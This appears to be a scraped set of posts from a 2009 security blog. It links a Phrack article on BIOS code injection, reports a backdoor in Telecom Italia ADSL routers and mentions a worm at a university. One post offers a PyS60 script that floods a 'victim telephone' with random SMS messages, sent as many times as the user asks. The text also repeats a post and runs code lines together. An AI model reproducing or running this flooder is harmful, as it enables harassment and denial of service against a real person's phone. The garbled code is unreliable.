Persistent bios infection
June 14th, 2009Phrack#66 is out and it contains a very nice article about injecting your own code in the BIOS eeprom.
You can read it here.
Phrack#66 is out and it contains a very nice article about injecting your own code in the BIOS eeprom.
You can read it here.
How to spend your time during a long travel:
# flood a victim telephone with random generated sms (for pys60)
import messaging
import appuifw
import randomdef rnd():
return random.randint(97,97+26)num=appuifw.query(u”telephone number?”,”text”)
cnt=appuifw.query(u”how many?”,”number”)while abs(cnt)>0:
testo=chr(rnd())+chr(rnd())+chr(rnd())+chr(rnd())+chr(rnd())
messaging.sms_send(num,testo)
cnt=cnt-1
print “sent: “+testo
I am still alive …
After this hard session of exams I will come back with some new ideas and code … just one exam left!
An evil backdoor has been discovered in some ADSL routers given by Telecom Italia for the ADSL service called “alice”. You can read all the details here.
Do they want to control us all?
I have just got a worm in the last place where you can think that something like this can happen … in the university faculty of engineering where I study.
Here the beasty